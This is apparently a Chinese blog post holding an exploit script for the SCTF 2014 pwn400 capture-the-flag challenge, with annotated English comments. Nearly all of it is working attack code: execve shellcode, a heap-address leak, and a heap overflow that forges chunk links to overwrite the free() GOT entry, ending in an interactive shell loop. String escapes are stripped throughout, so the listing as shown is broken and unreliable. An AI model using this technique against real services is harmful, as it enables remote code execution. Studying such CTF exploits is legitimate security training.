• sctf pwn400


      这个题目在这个链接中分析得很透彻,不再多余地写了。http://bruce30262.logdown.com/posts/245613-sctf-2014-pwn400

      exploit:

    # Exploit script for the SCTF 2014 pwn400 challenge (a heap overflow that
    # ends in a GOT overwrite); the linked writeup holds the analysis. Python 2
    # only: `print` statement, xrange(), raw_input(). Transcription note: this
    # listing has lost the backslash of every string escape (`x90` stands for
    # `\x90`) and the `\n` terminators show up as literal line breaks inside the
    # quotes, so the text as shown does not parse; read the strings accordingly.
    from socket import *
    import struct
    import time
    
    # Body of note 3: a NOP sled, a short jump over the "AAAA" filler, a second
    # sled, then bytes that read as the common Linux x86 execve("/bin//sh") stub
    # (the "/bin//sh" text is visible as 2f 2f 73 68 / 2f 62 69 6e). Presumably
    # meant as \x-escaped bytes -- see the transcription note above.
    shellcode = "x90x90x90x90x90x90"+"xebx08"+"AAAA"+"x90"*10+"x31xc0x50x68x2fx2fx73x68x68x2fx62x69x6ex89xe3x50x59x50x5axb0x0bxcdx80"
    sock = socket(AF_INET, SOCK_STREAM)
    # CTF lab target on a private (RFC 1918) address.
    sock.connect(("192.168.200.7", 10001))
    
    # Every exchange below is sleep(1) followed by a single recv(): there is no
    # message framing, so the script assumes the service answers within a second
    # and that one recv() drains the reply. Adequate for a CTF harness only.
    time.sleep(1)
    print sock.recv(1024)
    #new two note: 2, 1
    # Menu option 1 creates a note; each of the three prompts that follow is
    # answered with the same value, i+1 (notes 1 and 2). The last answer
    # apparently doubles as the note's short body.
    for i in xrange(2):
         sock.send('1
    ')
         time.sleep(1)
         sock.recv(1024)
         sock.send(str(i+1) + '
    ')
         time.sleep(1)
         sock.recv(1024)
         sock.send(str(i+1) + '
    ')
         time.sleep(1)
         sock.recv(1024)
         sock.send(str(i+1) + '
    ')
         time.sleep(1)
         sock.recv(1024)
    #new the third note: 3
    # Option 1 again, two prompts answered with 3, then (after an extra sleep)
    # the note body, which here is the shellcode instead of a short string.
    sock.send('1
    ')
    time.sleep(1)
    sock.recv(1024)
    sock.send('3
    ')
    time.sleep(1)
    sock.recv(1024)
    sock.send('3
    ')
    time.sleep(1)
    sock.recv(1024)
    time.sleep(1)
    #store shellcode in note 3
    sock.send(shellcode+"
    ")
    
    #get the note 1's address
    # Option 3 shows a note. The reply for note 1 carries a "location:" field
    # holding the note's heap address; this is the one read that is looped until
    # the marker arrives rather than trusting a single recv().
    sock.send('3
    ')
    time.sleep(1)
    print sock.recv(100)
    sock.send('1
    ')
    time.sleep(1)
    note1_addr = sock.recv(2048)
    while note1_addr.find('location:') == -1:
         note1_addr += sock.recv(2048)
    print note1_addr
    # "location:" is 9 characters; +11 skips two more (presumably the "0x"
    # prefix or a separator), leaving the hex digits up to the end of the line.
    note1_addr = note1_addr[note1_addr.find('location:') + 11:]
    note1_addr = note1_addr[:note1_addr.find('
    ')]
    addr1 = int(note1_addr, 16)
    print addr1
    #note 2's address
    # Notes are assumed to sit at a fixed 0x170 stride on the heap; nothing
    # here verifies that assumption against the service.
    addr2 = addr1 + 0x170
    #note 3's address
    addr3 = addr2 + 0x170
    #shellcode's address
    # 0x6c is taken to be the offset of the body inside a note chunk; packed as
    # a 32-bit little-endian pointer for the payload below.
    addr_shellcode = struct.pack("<I", addr3 + 0x6c)
    #free()'s Got: 0x0804a450
    # Oversized body for note 1: 256 bytes of filler, presumably to run past the
    # note's buffer, then "BBBB", note 2's address, the shellcode address and
    # the trailer that reads as 0x0804a44c (the stated free() GOT entry minus
    # 4), laid over the adjacent chunk's metadata. NOTE(review): this is the
    # classic write through corrupted heap-chunk links; a glibc with unlink
    # integrity checks, full RELRO, or NX would each break this chain.
    exploit = "A"*256+"BBBB"+struct.pack("<I",addr2)+addr_shellcode+"x4cxa4x04x08"
    
    #edit note 1
    # Option 4 = edit; the oversized body above is written into note 1.
    sock.send("4
    ")
    time.sleep(1)
    print sock.recv(1024)
    sock.send("1
    ")
    time.sleep(1)
    print sock.recv(1024)
    sock.send(exploit+"
    ")
    time.sleep(1)
    print sock.recv(1024)
    
    #delete node 2
    # Option 5 = delete, with the note identified by its address
    # (hex(addr2)[2:10] drops the "0x" prefix and keeps up to 8 hex digits).
    # Freeing note 2 is what consumes the corrupted metadata written above;
    # presumably the next call through free() then lands in the shellcode.
    sock.send("5
    ")
    time.sleep(1)
    sock.recv(1024)
    time.sleep(1)
    sock.send(hex(addr2)[2:10]+'
    ')
    time.sleep(1)
    sock.recv(1024)
    
    # Interactive loop: forward each local line and print whatever comes back.
    # The "$ " prompt is printed locally; a shell is expected at the other end.
    while True:
        sock.send(raw_input('$ ') + '
    ')
        time.sleep(1)
        temp = sock.recv(2048)
        print temp
  • 原文地址:https://www.cnblogs.com/wangaohui/p/4395133.html